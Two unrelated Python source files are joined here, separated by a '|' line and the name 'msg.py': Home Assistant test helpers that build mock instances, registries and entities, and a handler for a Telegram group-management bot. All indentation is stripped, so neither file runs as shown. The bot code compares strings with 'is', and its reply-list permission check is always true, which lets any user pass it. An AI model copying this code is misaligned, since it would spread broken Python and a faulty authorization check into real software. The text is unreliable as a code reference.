"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant()
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock) and not isinstance(target, AsyncMock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock):
fut = asyncio.Future()
fut.set_result(None)
return fut
return orig_async_create_task(coroutine)
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.data[loader.DATA_CUSTOM_COMPONENTS] = {}
hass.config.location_name = "test home"
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone("US/Pacific")
hass.config.units = METRIC_SYSTEM
hass.config.media_dirs = {"local": get_test_config_dir("media")}
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
async def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch("homeassistant.core._async_create_timer"), patch.object(
hass, "async_stop_track_tasks"
):
await orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
async def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode("utf-8")
msg = Message(topic, payload, qos, retain)
hass.data["mqtt"]._mqtt_handle_message(msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, datetime_, fire_all=False):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(datetime_)})
for task in list(hass.loop._scheduled):
if not isinstance(task, asyncio.TimerHandle):
continue
if task.cancelled():
continue
mock_seconds_into_future = datetime_.timestamp() - time.time()
future_seconds = task.when() - hass.loop.time()
if fire_all or mock_seconds_into_future >= future_seconds:
with patch(
"homeassistant.helpers.event.time_tracker_utcnow",
return_value=date_util.as_utc(datetime_),
):
task._run()
task.cancel()
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(
EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
@ha.callback
def async_fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.async_fire(
EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), "fixtures", filename)
with open(path, encoding="utf-8") as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {"entity_id": new_state.entity_id, "new_state": new_state}
if old_state:
event_data["old_state"] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError(f"Integration {component} is already setup")
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or OrderedDict()
registry._rebuild_index()
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
def mock_area_registry(hass, mock_entries=None):
"""Mock the Area Registry."""
registry = area_registry.AreaRegistry(hass)
registry.areas = mock_entries or OrderedDict()
hass.data[area_registry.DATA_REGISTRY] = registry
return registry
def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None):
"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
registry.deleted_devices = mock_deleted_entries or OrderedDict()
registry._rebuild_index()
hass.data[device_registry.DATA_REGISTRY] = registry
return registry
class MockGroup(auth_models.Group):
"""Mock a group in Home Assistant."""
def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY):
"""Mock a group."""
kwargs = {"name": name, "policy": policy}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._groups[self.id] = self
return self
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(
self,
id=None,
is_owner=False,
is_active=True,
name="Mock User",
system_generated=False,
groups=None,
):
"""Initialize mock user."""
kwargs = {
"is_owner": is_owner,
"is_active": is_active,
"name": name,
"system_generated": system_generated,
"groups": groups or [],
"perm_lookup": None,
}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
def mock_policy(self, policy):
"""Mock a policy for a user."""
self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup)
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config
)
assert provider is not None, "Invalid config specified"
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError("Provider already registered")
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._set_defaults()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(
self,
domain=None,
dependencies=None,
setup=None,
requirements=None,
config_schema=None,
platform_schema=None,
platform_schema_base=None,
async_setup=None,
async_setup_entry=None,
async_unload_entry=None,
async_migrate_entry=None,
async_remove_entry=None,
partial_manifest=None,
):
"""Initialize the mock module."""
self.__name__ = f"homeassistant.components.{domain}"
self.__file__ = f"homeassistant/components/{domain}"
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
# Overlay to be used when generating manifest from this module
self._partial_manifest = partial_manifest
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if platform_schema_base is not None:
self.PLATFORM_SCHEMA_BASE = platform_schema_base
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = AsyncMock(return_value=True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
if async_migrate_entry is not None:
self.async_migrate_entry = async_migrate_entry
if async_remove_entry is not None:
self.async_remove_entry = async_remove_entry
def mock_manifest(self):
"""Generate a mock manifest to represent this module."""
return {
**loader.manifest_from_legacy_module(self.DOMAIN, self),
**(self._partial_manifest or {}),
}
class MockPlatform:
"""Provide a fake platform."""
__name__ = "homeassistant.components.light.bla"
__file__ = "homeassistant/components/blah/light"
# pylint: disable=invalid-name
def __init__(
self,
setup_platform=None,
dependencies=None,
platform_schema=None,
async_setup_platform=None,
async_setup_entry=None,
scan_interval=None,
):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = AsyncMock(return_value=None)
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self,
hass,
logger=None,
domain="test_domain",
platform_name="test_platform",
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger("homeassistant.helpers.entity_platform")
# Otherwise the constructor will blow up.
if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
)
class MockToggleEntity(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state, unique_id=None):
"""Initialize the mock entity."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the entity if any."""
self.calls.append(("name", {}))
return self._name
@property
def state(self):
"""Return the state of the entity if any."""
self.calls.append(("state", {}))
return self._state
@property
def is_on(self):
"""Return true if entity is on."""
self.calls.append(("is_on", {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the entity on."""
self.calls.append(("turn_on", kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the entity off."""
self.calls.append(("turn_off", kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls) if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(
self,
*,
domain="test",
data=None,
version=1,
entry_id=None,
source=config_entries.SOURCE_USER,
title="Mock Title",
state=None,
options={},
system_options={},
connection_class=config_entries.CONN_CLASS_UNKNOWN,
unique_id=None,
):
"""Initialize a mock config entry."""
kwargs = {
"entry_id": entry_id or uuid.uuid4().hex,
"domain": domain,
"data": data or {},
"system_options": system_options,
"options": options,
"version": version,
"title": title,
"connection_class": connection_class,
"unique_id": unique_id,
}
if source is not None:
kwargs["source"] = source
if state is not None:
kwargs["state"] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if isinstance(fname, pathlib.Path):
fname = str(fname)
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, "name", fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, "name", fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if "homeassistant/components" in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding="utf-8")
# Not found
raise FileNotFoundError(f"File not found: {fname}")
return patch.object(yaml_loader, "open", mock_open_f, create=True)
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
fut = asyncio.Future()
if exception is not None:
fut.set_exception(exception)
else:
fut.set_result(return_value)
return fut
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count is optional. It can be automatically
determined most of the time
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
async def mock_psc(hass, config_input, integration):
"""Mock the prepare_setup_component to capture config."""
domain_input = integration.domain
res = await async_process_component_config(hass, config_input, integration)
config[domain_input] = None if res is None else res.get(domain_input)
_LOGGER.debug(
"Configuration for %s, Validated: %s, Original %s",
domain_input,
config[domain_input],
config_input.get(domain_input),
)
return res
assert isinstance(config, dict)
with patch("homeassistant.config.async_process_component_config", mock_psc):
yield config
if domain is None:
assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format(
list(config.keys())
)
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert (
res_len == count
), f"setup_component failed, expected {count} got {res_len}: {res}"
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
last_states = {}
for state in states:
restored_state = state.as_dict()
restored_state["attributes"] = json.loads(
json.dumps(restored_state["attributes"], cls=JSONEncoder)
)
last_states[state.entity_id] = restore_state.StoredState(
State.from_dict(restored_state), now
)
data.last_states = last_states
_LOGGER.debug("Restore cache: %s", data.last_states)
assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}"
hass.data[key] = data
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if "entity_id" in values:
self.entity_id = values["entity_id"]
@property
def name(self):
"""Return the name of the entity."""
return self._handle("name")
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle("should_poll")
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle("unique_id")
@property
def state(self):
"""Return the state of the entity."""
return self._handle("state")
@property
def available(self):
"""Return True if entity is available."""
return self._handle("available")
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle("device_info")
@property
def device_class(self):
"""Info how device should be classified."""
return self._handle("device_class")
@property
def unit_of_measurement(self):
"""Info on the units the entity state is in."""
return self._handle("unit_of_measurement")
@property
def capability_attributes(self):
"""Info about capabilities."""
return self._handle("capability_attributes")
@property
def supported_features(self):
"""Info about supported features."""
return self._handle("supported_features")
@property
def entity_registry_enabled_default(self):
"""Return if the entity should be enabled when first added to the entity registry."""
return self._handle("entity_registry_enabled_default")
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if "data" not in mock_data or "version" not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info("Loading data for %s: %s", store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
_LOGGER.info("Writing data to %s: %s", store.key, data_to_write)
# To ensure that the data can be serialized
data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder))
async def mock_remove(store):
"""Remove data."""
data.pop(store.key, None)
with patch(
"homeassistant.helpers.storage.Store._async_load",
side_effect=mock_async_load,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store._write_data",
side_effect=mock_write_data,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store.async_remove",
side_effect=mock_remove,
autospec=True,
):
yield data
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
store._async_cleanup_final_write_listener()
store._async_cleanup_delay_listener()
await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
"""Get system health info."""
return await hass.data["system_health"][domain].info_callback(hass)
def mock_integration(hass, module):
"""Mock an integration."""
integration = loader.Integration(
hass, f"homeassistant.components.{module.DOMAIN}", None, module.mock_manifest()
)
def mock_import_platform(platform_name):
raise ImportError(
f"Mocked unable to import platform '{platform_name}'",
name=f"{integration.pkg_path}.{platform_name}",
)
integration._import_platform = mock_import_platform
_LOGGER.info("Adding mock integration: %s", module.DOMAIN)
hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration
hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module
return integration
def mock_entity_platform(hass, platform_path, module):
"""Mock a entity platform.
platform_path is in form light.hue. Will create platform
hue.light.
"""
domain, platform_name = platform_path.split(".")
mock_platform(hass, f"{platform_name}.{domain}", module)
def mock_platform(hass, platform_path, module=None):
"""Mock a platform.
platform_path is in form hue.config_flow.
"""
domain, platform_name = platform_path.split(".")
integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {})
module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
if domain not in integration_cache:
mock_integration(hass, MockModule(domain))
_LOGGER.info("Adding mock integration platform: %s", platform_path)
module_cache[platform_path] = module or Mock()
def async_capture_events(hass, event_name):
"""Create a helper that captures events."""
events = []
@ha.callback
def capture_events(event):
events.append(event)
hass.bus.async_listen(event_name, capture_events)
return events
@ha.callback
def async_mock_signal(hass, signal):
"""Catch all dispatches to a signal."""
calls = []
@ha.callback
def mock_signal_handler(*args):
"""Mock service call."""
calls.append(args)
hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler)
return calls
class hashdict(dict):
"""
hashable dict implementation, suitable for use as a key into other dicts.
>>> h1 = hashdict({"apples": 1, "bananas":2})
>>> h2 = hashdict({"bananas": 3, "mangoes": 5})
>>> h1+h2
hashdict(apples=1, bananas=3, mangoes=5)
>>> d1 = {}
>>> d1[h1] = "salad"
>>> d1[h1]
'salad'
>>> d1[h2]
Traceback (most recent call last):
...
KeyError: hashdict(bananas=3, mangoes=5)
based on answers from
http://stackoverflow.com/questions/1151658/python-hashable-dicts
"""
def __key(self):
return tuple(sorted(self.items()))
def __repr__(self): # noqa: D105 no docstring
return ", ".join(f"{i[0]!s}={i[1]!r}" for i in self.__key())
def __hash__(self): # noqa: D105 no docstring
return hash(self.__key())
def __setitem__(self, key, value): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def __delitem__(self, key): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def clear(self): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def pop(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def popitem(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def setdefault(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def update(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
# update is not ok because it mutates the object
# __add__ is ok because it creates a new object
# while the new object is under construction, it's ok to mutate it
def __add__(self, right): # noqa: D105 no docstring
result = hashdict(self)
dict.update(result, right)
return result
def assert_lists_same(a, b):
"""Compare two lists, ignoring order."""
assert collections.Counter([hashdict(i) for i in a]) == collections.Counter(
[hashdict(i) for i in b]
)
|
msg.py
|
from utlis.rank import setrank ,isrank ,remrank ,setsudos ,remsudos ,setsudo,IDrank,GPranks
from utlis.send import send_msg, BYusers, sendM,Glang,GetLink
from handlers.delete import delete
from utlis.tg import Bot, Ckuser
from handlers.ranks import ranks
from handlers.locks import locks
from handlers.gpcmd import gpcmd
from handlers.sudo import sudo
from handlers.all import allGP
from utlis.tg import Bot,Del24
from config import *
from pyrogram import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton
import threading, requests, time, random, re , json,datetime,importlib
def updateHandlers(client, message,redis):
if redis.get("{}Nbot:bigM".format(BOT_ID)):
return False
type = message.chat.type
try:
userID = message.from_user.id
chatID = message.chat.id
except Exception as e:
return 0
c = importlib.import_module("lang.arcmd")
r = importlib.import_module("lang.arreply")
if (type is "supergroup" or type is "group") and message.outgoing != True:
userID = message.from_user.id
chatID = message.chat.id
rank = isrank(redis,userID,chatID)
group = redis.sismember("{}Nbot:groups".format(BOT_ID),chatID)
text = message.text
title = message.chat.title
if text and group is False:
if (rank is "sudo" or rank is "sudos" or rank is "asudo") or (redis.get("{}Nbot:autoaddbot".format(BOT_ID)) and GPranks(userID,chatID) == "creator"):
if text == c.add:
if redis.get("{}Nbot:autoaddbotN".format(BOT_ID)):
auN = int(redis.get("{}Nbot:autoaddbotN".format(BOT_ID)))
else:
auN = 1
if auN >= Bot("getChatMembersCount",{"chat_id":chatID})["result"] and not (rank is "sudo" or rank is "sudos"):
Bot("sendMessage",{"chat_id":chatID,"text":r.Toolow.format((int(redis.get("{}Nbot:autoaddbotN".format(BOT_ID))) or 0)),"reply_to_message_id":message.message_id,"parse_mode":"html"})
return False
GetME = Bot("getChatMember",{"chat_id":chatID,"user_id":BOT_ID})["result"]
if (not GetME["can_change_info"] or not GetME["can_delete_messages"] or not GetME["can_invite_users"] or not GetME["can_restrict_members"] or not GetME["can_pin_messages"] or not GetME["can_promote_members"]):
Bot("sendMessage",{"chat_id":chatID,"text":r.GiveMEall,"reply_to_message_id":message.message_id,"parse_mode":"html"})
return False
if text == c.add and not redis.sismember("{}Nbot:disabledgroups".format(BOT_ID),chatID) and Ckuser(message):
locksarray = {'Llink','Llongtext','Lmarkdown','Linline','Lfiles','Lcontact','Lbots','Lfwd','Lnote'}
for lock in locksarray:
redis.sadd("{}Nbot:{}".format(BOT_ID,lock),chatID)
ads = Bot("getChatAdministrators",{"chat_id":chatID})
for ad in ads['result']:
userId = ad["user"]["id"]
userFn = ad["user"]["first_name"]
if ad['status'] == "administrator" and int(userId) != int(BOT_ID):
setrank(redis,"admin",userId,chatID,"array")
if ad['status'] == "creator":
setrank(redis,"malk",userId,chatID,"one")
add = redis.sadd("{}Nbot:groups".format(BOT_ID),chatID)
Bot("exportChatInviteLink",{"chat_id":chatID})
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.MoreInfo, url="t.me/zx_xx")]])
Bot("sendMessage",{"chat_id":chatID,"text":r.doneadd.format(title),"reply_to_message_id":message.message_id,"parse_mode":"markdown","reply_markup":kb})
sendTO = (redis.get("{}Nbot:sudogp".format(BOT_ID)) or SUDO)
get = (redis.hget("{}Nbot:links".format(BOT_ID),chatID) or GetLink(chatID) or "https://t.me/zx_xx")
kb = InlineKeyboardMarkup([[InlineKeyboardButton("الرابط 🖇", url=get)]])
BY = "<a href=\"tg://user?id={}\">{}</a>".format(userID,message.from_user.first_name)
Bot("sendMessage",{"chat_id":sendTO,"text":f"تم تفعيل مجموعه جديدة ℹ️\nاسم المجموعه : {title}\nايدي المجموعه : {chatID}\nالمنشئ : {BY}\n⎯ ⎯ ⎯ ⎯","parse_mode":"html","reply_markup":kb})
elif text == c.add and redis.sismember("{}Nbot:disabledgroups".format(BOT_ID),chatID) and Ckuser(message):
redis.sadd("{}Nbot:groups".format(BOT_ID),chatID)
redis.srem("{}Nbot:disabledgroups".format(BOT_ID),chatID)
redis.hdel("{}Nbot:disabledgroupsTIME".format(BOT_ID),chatID)
Bot("sendMessage",{"chat_id":chatID,"text":r.doneadd2.format(title),"reply_to_message_id":message.message_id,"parse_mode":"markdown"})
if text == c.disabl and Ckuser(message):
Bot("sendMessage",{"chat_id":chatID,"text":r.disabled.format(title),"reply_to_message_id":message.message_id,"parse_mode":"markdown"})
if text and group is True:
if (rank is "sudo" or rank is "sudos" or rank is "asudo") or (redis.get("{}Nbot:autoaddbot".format(BOT_ID)) and GPranks(userID,chatID) == "creator"):
if text == c.add and Ckuser(message):
Bot("sendMessage",{"chat_id":chatID,"text":r.doneadded.format(title),"reply_to_message_id":message.message_id,"parse_mode":"markdown"})
if text == c.disabl and Ckuser(message):
redis.srem("{}Nbot:groups".format(BOT_ID),chatID)
redis.sadd("{}Nbot:disabledgroups".format(BOT_ID),chatID)
NextDay_Date = datetime.datetime.today() + datetime.timedelta(days=1)
redis.hset("{}Nbot:disabledgroupsTIME".format(BOT_ID),chatID,str(NextDay_Date))
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.MoreInfo, url="t.me/zx_xx")]])
Bot("sendMessage",{"chat_id":chatID,"text":r.disabl.format(title),"reply_to_message_id":message.message_id,"parse_mode":"markdown","reply_markup":kb})
if group is True:
t = threading.Thread(target=allGP,args=(client, message,redis))
t.daemon = True
t.start()
if text and group is True:
x = redis.smembers("{}Nbot:{}:TXoeders".format(BOT_ID,chatID))
for x in x:
x = x.split("=")
if re.search(f"^{x[0]}$", text) or re.search(f"^{x[0]} (.*)$", text):
text = text.replace(x[0], x[1])
message.text = text
if (rank is "sudo" or rank is "sudos" or rank is "asudo") and group is True:
t = threading.Thread(target=sudo,args=(client, message,redis))
t.daemon = True
t.start()
if text and (rank is "sudo" or rank is "asudo" or rank is "sudos" or rank is "malk" or rank is "acreator" or rank is "creator" or rank is "owner") and group is True:
t = threading.Thread(target=ranks,args=(client, message,redis))
t.daemon = True
t.start()
if text and (rank is "sudo" or rank is "asudo" or rank is "sudos" or rank is "malk" or rank is "acreator" or rank is "creator" or rank is "owner" or rank is "admin") and group is True and re.search(c.startlock,text):
if Ckuser(message):
t = threading.Thread(target=locks,args=(client, message,redis))
t.daemon = True
t.start()
if (rank is False or rank is 0) and group is True:
t = threading.Thread(target=delete,args=(client, message,redis))
t.daemon = True
t.start()
if (rank is "sudo" or rank is "asudo" or rank is "sudos" or rank is "malk" or rank is "acreator" or rank is "creator" or rank is "owner" or rank is "admin") and group is True:
t = threading.Thread(target=gpcmd,args=(client, message,redis))
t.daemon = True
t.start()
if type is "private" and message.outgoing != True:
text = message.text
rank = isrank(redis,userID,chatID)
if (rank is "sudo" or rank is "asudo" or rank is "sudos"):
t = threading.Thread(target=sudo,args=(client, message,redis))
t.daemon = True
t.start()
if text and re.search("^/start$",text):
userID = message.from_user.id
userFN = message.from_user.first_name
redis.sadd("{}Nbot:privates".format(BOT_ID),userID)
if rank == "sudo":
kb = ReplyKeyboardMarkup([[r.RKgp, r.RKgpl],[r.RKaf, r.RKrf],[r.RKf],["جلب نسخه احتياطيه"],[r.RKub]],resize_keyboard=True)
Bot("sendMessage",{"chat_id":chatID,"text":r.sudostart,"reply_to_message_id":message.message_id,"parse_mode":"html","reply_markup":kb})
return 0
getbot = client.get_me()
kb = InlineKeyboardMarkup([[InlineKeyboardButton("TshakeTeam", url="t.me/zx_xx")]])
Bot("sendMessage",{"chat_id":chatID,"text":r.botstart.format(getbot.first_name,getbot.username),"reply_to_message_id":message.message_id,"parse_mode":"html","reply_markup":kb})
if text and re.search("^/start (.*)$",text):
tx = text.replace("/start ","")
split = tx.split("=")
order = split[0]
if order == "showreplylistBOT":
chatId = split[1]
userId = split[2]
TY = split[3]
rank = isrank(redis,userId,chatId)
if (rank == "sudo" or rank is "asudo" or rank == "sudos"):
li = redis.hkeys("{}Nbot:{}".format(BOT_ID,TY))
if li:
i = 1
words = ""
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Bot("sendMessage",{"chat_id":userId,"text":words,"reply_to_message_id":message.message_id,"parse_mode":"html"})
words = ''
Bot("sendMessage",{"chat_id":userId,"text":words,"reply_to_message_id":message.message_id,"parse_mode":"html"})
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.Delall2R,callback_data=json.dumps(["del{}".format(TY+'BOT'),"",userID])),]])
Bot("sendMessage",{"chat_id":chatID,"text":r.DelallR,"reply_to_message_id":message.message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if order == "showreplylist":
chatId = split[1]
userId = split[2]
TY = split[3]
group = redis.sismember("{}Nbot:groups".format(BOT_ID),chatId)
rank = isrank(redis,userId,chatId)
if (rank is not False or rank is not 0 or rank != "vip" or rank != "admin") and group is True:
li = redis.hkeys("{}Nbot:{}:{}".format(BOT_ID,chatId,TY))
if li:
i = 1
words = ""
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Bot("sendMessage",{"chat_id":userId,"text":words,"reply_to_message_id":message.message_id,"parse_mode":"html"})
words = ''
Bot("sendMessage",{"chat_id":userId,"text":words,"reply_to_message_id":message.message_id,"parse_mode":"html"})
